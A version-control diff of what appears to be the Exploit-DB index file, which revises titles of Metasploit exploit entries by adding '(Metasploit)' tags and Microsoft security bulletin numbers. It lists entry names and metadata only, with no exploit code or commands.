 16381,platforms/windows/remote/16381.rb,"MOXA Device Manager Tool 2.1 - Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,0
 16382,platforms/windows/remote/16382.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_INITIALIZE Buffer Overflow (Metasploit)",2010-11-30,Metasploit,windows,remote,0
@@ -10452,20 +10461,20 @@ id,file,description,date,author,platform,type,port
 16384,platforms/windows/remote/16384.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_TXTEVENT Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,0
 16385,platforms/windows/remote/16385.rb,"DATAC RealWin SCADA Server - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16386,platforms/windows/remote/16386.rb,"D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit) (2)",2010-07-03,Metasploit,windows,remote,0
-16387,platforms/hardware/remote/16387.rb,"Broadcom Wireless Driver - Probe Response SSID Overflow (2) (Metasploit)",2010-07-03,Metasploit,hardware,remote,0
+16387,platforms/hardware/remote/16387.rb,"Broadcom Wireless Driver - Probe Response SSID Overflow (Metasploit) (2)",2010-07-03,Metasploit,hardware,remote,0
 16388,platforms/hardware/remote/16388.rb,"Netgear WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit)",2010-07-03,Metasploit,hardware,remote,0
 16389,platforms/windows/remote/16389.rb,"Omni-NFS Server - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0
 16390,platforms/windows/remote/16390.rb,"Energizer DUO Trojan Code - Execution (Metasploit)",2010-09-20,Metasploit,windows,remote,0
 16391,platforms/windows/remote/16391.rb,"EMC AlphaStor Agent - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
-16392,platforms/windows/remote/16392.rb,"Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (Metasploit)",2011-01-24,Metasploit,windows,remote,0
-16393,platforms/windows/remote/16393.rb,"Microsoft SQL Server - Resolution Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
-16394,platforms/windows/remote/16394.rb,"Microsoft SQL Server - Payload Execution (via SQL Injection)",2011-02-08,Metasploit,windows,remote,0
+16392,platforms/windows/remote/16392.rb,"Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (Metasploit)",2011-01-24,Metasploit,windows,remote,0
+16393,platforms/windows/remote/16393.rb,"Microsoft SQL Server - Resolution Overflow (MS02-039) (Metasploit)",2010-04-30,Metasploit,windows,remote,0
+16394,platforms/windows/remote/16394.rb,"Microsoft SQL Server - Payload Execution (via SQL Injection) (Metasploit)",2011-02-08,Metasploit,windows,remote,0
 16395,platforms/windows/remote/16395.rb,"Microsoft SQL Server - Payload Execution (Metasploit)",2010-12-21,Metasploit,windows,remote,0
-16396,platforms/windows/remote/16396.rb,"Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (via SQL Injection)",2011-02-08,Metasploit,windows,remote,0
+16396,platforms/windows/remote/16396.rb,"Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (via SQL Injection) (Metasploit)",2011-02-08,Metasploit,windows,remote,0
 16397,platforms/windows/remote/16397.rb,"Lyris ListManager - MSDE Weak sa Password (Metasploit)",2010-09-20,Metasploit,windows,remote,0
-16398,platforms/windows/remote/16398.rb,"Microsoft SQL Server - Hello Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
+16398,platforms/windows/remote/16398.rb,"Microsoft SQL Server - Hello Overflow (MS02-056) (Metasploit)",2010-04-30,Metasploit,windows,remote,0
 16399,platforms/windows/remote/16399.rb,"Seattle Lab Mail (SLMail) 5.5 - POP3 Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
-16400,platforms/windows/remote/16400.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (1)",2010-05-09,Metasploit,windows,remote,0
+16400,platforms/windows/remote/16400.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (Metasploit) (1)",2010-05-09,Metasploit,windows,remote,0
 16401,platforms/windows/remote/16401.rb,"CA BrightStor ARCserve - Message Engine Heap Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
 16402,platforms/windows/remote/16402.rb,"CA BrightStor - HSM Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16403,platforms/windows/remote/16403.rb,"CA BrightStor Agent for Microsoft SQL - Overflow Exploit (Metasploit)",2010-04-30,Metasploit,windows,remote,0
@@ -10474,19 +10483,19 @@ id,file,description,date,author,platform,type,port
 16406,platforms/windows/remote/16406.rb,"CA BrightStor Discovery Service - Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16407,platforms/windows/remote/16407.rb,"CA BrightStor ARCserve - Tape Engine Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16408,platforms/windows/remote/16408.rb,"CA BrightStor Discovery Service - TCP Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
-16409,platforms/windows/remote/16409.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (2)",2010-11-03,Metasploit,windows,remote,0
+16409,platforms/windows/remote/16409.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (Metasploit) (2)",2010-11-03,Metasploit,windows,remote,0
 16410,platforms/windows/remote/16410.rb,"Computer Associates - Alert Notification Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
-16411,platforms/windows/remote/16411.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (3)",2010-11-03,Metasploit,windows,remote,0
+16411,platforms/windows/remote/16411.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (Metasploit) (3)",2010-11-03,Metasploit,windows,remote,0
 16412,platforms/windows/remote/16412.rb,"CA BrightStor ARCserve Message Engine 0x72 - Buffer Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0
 16413,platforms/windows/remote/16413.rb,"CA BrightStor ArcServe - Media Service Stack Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0
 16414,platforms/windows/remote/16414.rb,"CA BrightStor ARCserve License Service - GCR NETWORK Buffer Overflow (Metasploit)",2010-11-03,Metasploit,windows,remote,0
 16415,platforms/windows/remote/16415.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - (rxsSetDataGrowthScheduleAndFilter) Buffer Overflow (Metasploit)",2011-03-10,Metasploit,windows,remote,0
 16416,platforms/windows/remote/16416.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - Multiple Commands Buffer Overflow (Metasploit)",2010-11-04,Metasploit,windows,remote,0
-16417,platforms/windows/remote/16417.rb,"CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (1)",2010-10-05,Metasploit,windows,remote,0
+16417,platforms/windows/remote/16417.rb,"CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (Metasploit) (1)",2010-10-05,Metasploit,windows,remote,0
 16418,platforms/windows/remote/16418.rb,"CA BrightStor ARCserve - Message Engine Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
 16419,platforms/windows/remote/16419.rb,"Mercury/32 <= 4.01b - PH Server Module Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
 16420,platforms/windows/remote/16420.rb,"Firebird Relational Database - SVC_attach() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0
-16421,platforms/windows/remote/16421.rb,"IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (1)",2010-05-09,Metasploit,windows,remote,0
+16421,platforms/windows/remote/16421.rb,"IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (Metasploit) (1)",2010-05-09,Metasploit,windows,remote,0
 16422,platforms/windows/remote/16422.rb,"mIRC 6.34 - PRIVMSG Handling Stack Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0
 16423,platforms/windows/remote/16423.rb,"SAP Business One License Manager 2005 - Buffer Overflow (Metasploit)",2010-11-30,Metasploit,windows,remote,0
 16424,platforms/windows/remote/16424.rb,"Apple QuickTime 7.3 - RTSP Response Header Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
@@ -10500,14 +10509,14 @@ id,file,description,date,author,platform,type,port
 16432,platforms/windows/remote/16432.rb,"Firebird Relational Database - isc_create_database() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0
 16433,platforms/windows/remote/16433.rb,"BomberClone 0.11.6 - Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
 16434,platforms/windows/remote/16434.rb,"Borland CaliberRM - StarTeam Multicast Service Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
-16435,platforms/windows/remote/16435.rb,"HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (1)",2010-09-20,Metasploit,windows,remote,0
+16435,platforms/windows/remote/16435.rb,"HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (Metasploit) (1)",2010-09-20,Metasploit,windows,remote,0
 16436,platforms/windows/remote/16436.rb,"Netcat 1.10 - NT Stack Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0
 16437,platforms/windows/remote/16437.rb,"Borland Interbase - isc_create_database() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0
 16438,platforms/windows/remote/16438.rb,"eIQNetworks ESA - Topology DELETEDEVICE Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0
 16439,platforms/windows/remote/16439.rb,"NetTransport Download Manager 2.90.510 - Buffer Overflow (Metasploit)",2010-08-25,Metasploit,windows,remote,0
 16440,platforms/windows/remote/16440.rb,"Firebird Relational Database - isc_attach_database() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0
 16441,platforms/windows/remote/16441.rb,"POP Peeper 3.4 - DATE Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0
-16442,platforms/windows/remote/16442.rb,"Microsoft DirectX DirectShow - SAMI Buffer Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0
+16442,platforms/windows/remote/16442.rb,"Microsoft DirectX DirectShow - SAMI Buffer Overflow (MS07-064) (Metasploit)",2010-10-05,Metasploit,windows,remote,0
 16443,platforms/windows/remote/16443.rb,"Eureka Email Client 2.2q - ERR Remote Buffer Overflow (Metasploit) (2)",2010-08-25,Metasploit,windows,remote,0
 16444,platforms/windows/remote/16444.rb,"TinyIdentD 2.2 - Stack Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0
 16445,platforms/windows/remote/16445.rb,"Bopup Communications Server - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
@@ -10520,7 +10529,7 @@ id,file,description,date,author,platform,type,port
 16452,platforms/windows/remote/16452.rb,"AgentX++ Master - AgentX::receive_agentx Stack Buffer Overflow (Metasploit)",2010-05-11,Metasploit,windows,remote,0
 16453,platforms/windows/remote/16453.rb,"Borland Interbase - Create-Request Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
 16454,platforms/windows/remote/16454.rb,"ShixxNOTE 6.net - Font Field Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
-16455,platforms/windows/remote/16455.rb,"HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (2)",2010-09-20,Metasploit,windows,remote,0
+16455,platforms/windows/remote/16455.rb,"HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (Metasploit) (2)",2010-09-20,Metasploit,windows,remote,0
 16456,platforms/windows/remote/16456.rb,"Realtek Media Player Playlist - Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,0
 16457,platforms/windows/remote/16457.rb,"LANDesk Management Suite 8.7 - Alert Service Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16458,platforms/windows/remote/16458.rb,"POP Peeper 3.4 - UIDL Buffer Overflow (Metasploit)",2010-11-30,Metasploit,windows,remote,0
@@ -10532,12 +10541,12 @@ id,file,description,date,author,platform,type,port
 16464,platforms/windows/remote/16464.rb,"ISS - 'PAM.dll' ICQ Parser Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0
 16465,platforms/windows/remote/16465.rb,"Kerio Personal Firewall 2.1.4 - Authentication Packet Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
 16466,platforms/win_x86/remote/16466.rb,"Knox Arkeia Backup Client Type 77 (Windows x86) - Overflow Exploit (Metasploit)",2010-05-09,Metasploit,win_x86,remote,0
-16467,platforms/windows/remote/16467.rb,"Microsoft IIS/PWS - CGI Filename Double Decode Command Execution (Metasploit)",2011-01-08,Metasploit,windows,remote,0
-16468,platforms/windows/remote/16468.rb,"Microsoft IIS 4.0 - '.htr' Path Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
-16469,platforms/windows/remote/16469.rb,"Microsoft IIS 5.0 - Printer Host Header Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
-16470,platforms/windows/remote/16470.rb,"Microsoft IIS 5.0 - WebDAV 'ntdll.dll' Path Overflow (Metasploit)",2010-07-25,Metasploit,windows,remote,0
+16467,platforms/windows/remote/16467.rb,"Microsoft IIS/PWS - CGI Filename Double Decode Command Execution (MS01-026) (Metasploit)",2011-01-08,Metasploit,windows,remote,0
+16468,platforms/windows/remote/16468.rb,"Microsoft IIS 4.0 - '.htr' Path Overflow (MS02-018) (Metasploit)",2010-04-30,Metasploit,windows,remote,0
+16469,platforms/windows/remote/16469.rb,"Microsoft IIS 5.0 - Printer Host Header Overflow (MS01-023) (Metasploit)",2010-04-30,Metasploit,windows,remote,0
+16470,platforms/windows/remote/16470.rb,"Microsoft IIS 5.0 - WebDAV 'ntdll.dll' Path Overflow (MS03-007) (Metasploit)",2010-07-25,Metasploit,windows,remote,0
 16471,platforms/windows/remote/16471.rb,"Microsoft IIS - WebDAV Write Access Code Execution (Metasploit)",2010-09-20,Metasploit,windows,remote,0
-16472,platforms/windows/remote/16472.rb,"Microsoft IIS 5.0 - IDQ Path Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
+16472,platforms/windows/remote/16472.rb,"Microsoft IIS 5.0 - IDQ Path Overflow (MS01-033) (Metasploit)",2010-06-15,Metasploit,windows,remote,0
 16473,platforms/windows/remote/16473.rb,"Mercury/32 Mail Server <= 4.01b - LOGIN Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0
 16474,platforms/windows/remote/16474.rb,"Eudora Qualcomm WorldMail 3.0 - IMAPD LIST Buffer Overflow (Metasploit)",2010-07-01,Metasploit,windows,remote,0
 16475,platforms/windows/remote/16475.rb,"MailEnable IMAPD Professional (2.35) - Login Request Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
@@ -10559,7 +10568,7 @@ id,file,description,date,author,platform,type,port
 16491,platforms/windows/remote/16491.rb,"WinVNC Web Server 3.3.3r7 - GET Overflow (Metasploit)",2009-12-06,Metasploit,windows,remote,0
 16492,platforms/windows/remote/16492.rb,"Novell iPrint Client - ActiveX Control ExecuteRequest debug Buffer Overflow (Metasploit)",2010-09-21,Metasploit,windows,remote,0
 16493,platforms/windows/remote/16493.rb,"EnjoySAP SAP GUI - ActiveX Control Arbitrary File Download (Metasploit)",2010-12-01,Metasploit,windows,remote,0
-16494,platforms/windows/remote/16494.rb,"Adobe CoolType - SING Table 'uniqueName' Stack Buffer Overflow (1)",2010-09-20,Metasploit,windows,remote,0
+16494,platforms/windows/remote/16494.rb,"Adobe CoolType - SING Table 'uniqueName' Stack Buffer Overflow (Metasploit) (1)",2010-09-20,Metasploit,windows,remote,0
 16495,platforms/multiple/remote/16495.rb,"Sun Java Web Start BasicServiceImpl - Remote Code Execution (Metasploit)",2011-01-22,Metasploit,multiple,remote,0
 16496,platforms/windows/remote/16496.rb,"Kazaa Altnet Download Manager - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16497,platforms/windows/remote/16497.rb,"RealPlayer - 'ierpplug.dll' ActiveX Control Playlist Name Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
@@ -10569,8 +10578,8 @@ id,file,description,date,author,platform,type,port
 16501,platforms/windows/remote/16501.rb,"Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit) (2)",2010-09-21,Metasploit,windows,remote,0
 16502,platforms/windows/remote/16502.rb,"IBM Lotus Domino Web Access Upload Module - Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0
 16505,platforms/windows/remote/16505.rb,"Facebook Photo Uploader 4 - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
-16506,platforms/windows/remote/16506.rb,"Microsoft Internet Explorer - Daxctle.OCX KeyFrame Method Heap Buffer Overflow (Metasploit)",2010-07-16,Metasploit,windows,remote,0
-16507,platforms/windows/remote/16507.rb,"Microsoft Visual Studio - Msmask32.ocx ActiveX Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,0
+16506,platforms/windows/remote/16506.rb,"Microsoft Internet Explorer - Daxctle.OCX KeyFrame Method Heap Buffer Overflow (MS06-067) (Metasploit)",2010-07-16,Metasploit,windows,remote,0
+16507,platforms/windows/remote/16507.rb,"Microsoft Visual Studio - Msmask32.ocx ActiveX Buffer Overflow (MS08-070) (Metasploit)",2010-11-24,Metasploit,windows,remote,0
 16508,platforms/windows/remote/16508.rb,"Novell iPrint Client - ActiveX Control Buffer Overflow (Metasploit)",2008-06-16,Metasploit,windows,remote,0
 16509,platforms/windows/remote/16509.rb,"Mozilla Firefox - Interleaving document.write and appendChild Exploit (Metasploit)",2011-02-22,Metasploit,windows,remote,0
 16510,platforms/windows/remote/16510.rb,"McAfee Subscription Manager - Stack Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0
@@ -10584,79 +10593,79 @@ id,file,description,date,author,platform,type,port
 16518,platforms/windows/remote/16518.rb,"Chilkat Crypt - ActiveX WriteFile Unsafe Method (Metasploit)",2010-09-20,Metasploit,windows,remote,0
 16519,platforms/windows/remote/16519.rb,"Yahoo! Messenger 8.1.0.249 - ActiveX Control Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
 16520,platforms/windows/remote/16520.rb,"VeryPDF PDFView - OCX ActiveX OpenPDF Heap Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0
-16521,platforms/windows/remote/16521.rb,"Microsoft Windows Media Encoder 9 - 'wmex.dll' ActiveX Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
+16521,platforms/windows/remote/16521.rb,"Microsoft Windows Media Encoder 9 - 'wmex.dll' ActiveX Buffer Overflow (MS08-053) (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16522,platforms/windows/remote/16522.rb,"Yahoo! Messenger - 'YVerInfo.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16523,platforms/windows/remote/16523.rb,"Novell iPrint Client - ActiveX Control target-frame Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16524,platforms/windows/remote/16524.rb,"AwingSoft Winds3D Player - SceneURL Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
 16525,platforms/windows/remote/16525.rb,"AOL Instant Messenger AIM - goaway Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0
-16526,platforms/windows/remote/16526.rb,"Microsoft Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)",2010-08-12,Metasploit,windows,remote,0
+16526,platforms/windows/remote/16526.rb,"Microsoft Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) (MS07-017) (Metasploit)",2010-08-12,Metasploit,windows,remote,0
 16527,platforms/windows/remote/16527.rb,"Apple QuickTime 7.1.3 - RTSP URI Buffer Overflow (Metasploit)",2010-05-04,Metasploit,windows,remote,0
 16528,platforms/windows/remote/16528.rb,"Symantec Altiris Deployment Solution - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16529,platforms/windows/remote/16529.rb,"WinDVD7 - 'IASystemInfo.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16530,platforms/windows/remote/16530.rb,"mIRC - IRC URL Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
-16532,platforms/windows/remote/16532.rb,"Microsoft Internet Explorer - XML Core Services HTTP Request Handling (Metasploit)",2010-07-03,Metasploit,windows,remote,0
-16533,platforms/windows/remote/16533.rb,"Microsoft Internet Explorer - CSS Recursive Import Use-After-Free (Metasploit)",2011-02-08,Metasploit,windows,remote,0
+16532,platforms/windows/remote/16532.rb,"Microsoft Internet Explorer - XML Core Services HTTP Request Handling (MS06-071) (Metasploit)",2010-07-03,Metasploit,windows,remote,0
+16533,platforms/windows/remote/16533.rb,"Microsoft Internet Explorer - CSS Recursive Import Use-After-Free (MS11-003) (Metasploit)",2011-02-08,Metasploit,windows,remote,0
 16534,platforms/windows/remote/16534.rb,"AtHocGov IWSAlerts - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0
 16535,platforms/windows/remote/16535.rb,"Trend Micro OfficeScan - Client ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16536,platforms/windows/remote/16536.rb,"Green Dam - URL Processing Buffer Overflow (Metasploit)",2010-03-10,Metasploit,windows,remote,0
-16537,platforms/windows/remote/16537.rb,"Microsoft Office Web Components (OWC) Spreadsheet - msDataSourceObject Memory Corruption (Metasploit)",2010-07-20,Metasploit,windows,remote,0
+16537,platforms/windows/remote/16537.rb,"Microsoft Office Web Components (OWC) Spreadsheet - msDataSourceObject Memory Corruption (MS09-043) (Metasploit)",2010-07-20,Metasploit,windows,remote,0
 16538,platforms/windows/remote/16538.rb,"McAfee Visual
Trace - ActiveX Control Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0
 16539,platforms/windows/remote/16539.rb,"Creative Software AutoUpdate Engine - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16540,platforms/windows/remote/16540.rb,"Zenturi ProgramChecker ActiveX - Control Arbitrary File Download (Metasploit)",2010-11-24,Metasploit,windows,remote,0
-16541,platforms/windows/remote/16541.rb,"Microsoft Internet Explorer - Winhlp32.exe MsgBox Code Execution (Metasploit)",2010-09-28,Metasploit,windows,remote,0
-16542,platforms/windows/remote/16542.rb,"Microsoft OWC Spreadsheet - HTMLURL Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
+16541,platforms/windows/remote/16541.rb,"Microsoft Internet Explorer - Winhlp32.exe MsgBox Code Execution (MS10-023) (Metasploit)",2010-09-28,Metasploit,windows,remote,0
+16542,platforms/windows/remote/16542.rb,"Microsoft OWC Spreadsheet - HTMLURL Buffer Overflow (MS09-043) (Metasploit)",2010-04-30,Metasploit,windows,remote,0
 16543,platforms/windows/remote/16543.rb,"Novell iPrint Client - ActiveX Control Date/Time Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16544,platforms/windows/remote/16544.rb,"SonicWALL Aventail - 'epi.dll' AuthCredential Format String (Metasploit)",2010-09-20,Metasploit,windows,remote,0
-16545,platforms/windows/remote/16545.rb,"Microsoft Help Center - Cross-Site Scripting / Command Execution (Metasploit)",2010-09-20,Metasploit,windows,remote,0
-16547,platforms/windows/remote/16547.rb,"Microsoft Internet Explorer - Style getElementsByTagName Memory Corruption (Metasploit)",2010-07-12,Metasploit,windows,remote,0
+16545,platforms/windows/remote/16545.rb,"Microsoft Help Center - Cross-Site Scripting / Command Execution (MS10-042) (Metasploit)",2010-09-20,Metasploit,windows,remote,0
+16547,platforms/windows/remote/16547.rb,"Microsoft Internet Explorer - Style getElementsByTagName Memory Corruption (MS09-072)
(Metasploit)",2010-07-12,Metasploit,windows,remote,0
 16548,platforms/windows/remote/16548.rb,"Amaya Browser 11.0 - bdo tag Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16549,platforms/windows/remote/16549.rb,"Microsoft Internet Explorer - isComponentInstalled Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16550,platforms/windows/remote/16550.rb,"WebDAV - Application DLL Hijacker (Metasploit)",2010-09-24,Metasploit,windows,remote,0
-16551,platforms/windows/remote/16551.rb,"Microsoft Internet Explorer - CSS SetUserClip Memory Corruption (Metasploit)",2011-01-20,Metasploit,windows,remote,0
+16551,platforms/windows/remote/16551.rb,"Microsoft Internet Explorer - CSS SetUserClip Memory Corruption (MS10-090) (Metasploit)",2011-01-20,Metasploit,windows,remote,0
 16552,platforms/windows/remote/16552.rb,"Husdawg_ LLC. System Requirements Lab - ActiveX Unsafe Method (Metasploit)",2010-09-20,Metasploit,windows,remote,0
 16553,platforms/windows/remote/16553.rb,"BaoFeng Storm - 'mps.dll' ActiveX OnBeforeVideoDownload Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
 16554,platforms/windows/remote/16554.rb,"America Online ICQ - ActiveX Control Arbitrary File Download and Execute (Metasploit)",2010-11-24,Metasploit,windows,remote,0
-16555,platforms/windows/remote/16555.rb,"Microsoft Internet Explorer 7 - CFunctionPointer Uninitialized Memory Corruption (Metasploit)",2010-07-12,Metasploit,windows,remote,0
+16555,platforms/windows/remote/16555.rb,"Microsoft Internet Explorer 7 - CFunctionPointer Uninitialized Memory Corruption (MS09-002) (Metasploit)",2010-07-12,Metasploit,windows,remote,0
 16557,platforms/windows/remote/16557.rb,"Ask.com Toolbar - 'askBar.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16558,platforms/windows/remote/16558.rb,"Apple QuickTime 7.6.6 - Invalid SMIL URI Buffer Overflow (Metasploit)",2011-01-08,Metasploit,windows,remote,0
 16559,platforms/windows/remote/16559.rb,"Roxio CinePlayer - ActiveX Control Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
 16560,platforms/windows/remote/16560.rb,"Autodesk IDrop - ActiveX Control Heap Memory Corruption (Metasploit)",2010-04-30,Metasploit,windows,remote,0
-16561,platforms/windows/remote/16561.rb,"Microsoft Internet Explorer - COM CreateObject Code Execution (Metasploit)",2010-09-20,Metasploit,windows,remote,0
+16561,platforms/windows/remote/16561.rb,"Microsoft Internet Explorer - COM CreateObject Code Execution (MS06-014/MS06-073) (Metasploit)",2010-09-20,Metasploit,windows,remote,0
 16563,platforms/windows/remote/16563.rb,"Tumbleweed SecureTransport FileTransfer - 'vcst_eu.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
-16564,platforms/windows/remote/16564.rb,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit) (2)",2010-07-03,Metasploit,windows,remote,0
+16564,platforms/windows/remote/16564.rb,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (MS06-057) (Metasploit) (2)",2010-07-03,Metasploit,windows,remote,0
 16565,platforms/windows/remote/16565.rb,"RKD Software BarCode ActiveX Control 'BarCodeAx.dll' 4.9 - Remote Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16566,platforms/windows/remote/16566.rb,"CommuniCrypt Mail 1.16 - SMTP ActiveX Stack Buffer Overflow (Metasploit)",2010-07-26,Metasploit,windows,remote,0
-16567,platforms/windows/remote/16567.rb,"Microsoft Internet Explorer - Tabular Data Control ActiveX Memory Corruption (Metasploit)",2010-04-30,Metasploit,windows,remote,0
+16567,platforms/windows/remote/16567.rb,"Microsoft Internet Explorer - Tabular Data Control ActiveX Memory Corruption (MS10-018) (Metasploit)",2010-04-30,Metasploit,windows,remote,0
 16568,platforms/windows/remote/16568.rb,"Juniper SSL-VPN IVE - 'JuniperSetupDLL.dll' ActiveX Control Buffer Overflow
(Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16569,platforms/windows/remote/16569.rb,"Orbit Downloader - Connecting Log Creation Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16570,platforms/windows/remote/16570.rb,"AwingSoft Winds3D Player 3.5 - SceneURL Download and Execute (Metasploit)",2010-09-20,Metasploit,windows,remote,0
 16571,platforms/windows/remote/16571.rb,"iseemedia / Roxio / MGI Software LPViewer - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16572,platforms/windows/remote/16572.rb,"GOM Player - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16573,platforms/windows/remote/16573.rb,"Macrovision Installshield Update Service - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
-16574,platforms/windows/remote/16574.rb,"Microsoft Windows - Shell LNK Code Execution (Metasploit)",2010-09-21,Metasploit,windows,remote,0
+16574,platforms/windows/remote/16574.rb,"Microsoft Windows - Shell LNK Code Execution (MS10-046) (Metasploit)",2010-09-21,Metasploit,windows,remote,0
 16575,platforms/windows/remote/16575.rb,"SAP AG SAPgui EAI WebViewer3D - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16576,platforms/windows/remote/16576.rb,"Persits XUpload - ActiveX AddFile Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16577,platforms/windows/remote/16577.rb,"CA BrightStor ARCserve Backup - AddColumn() ActiveX Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
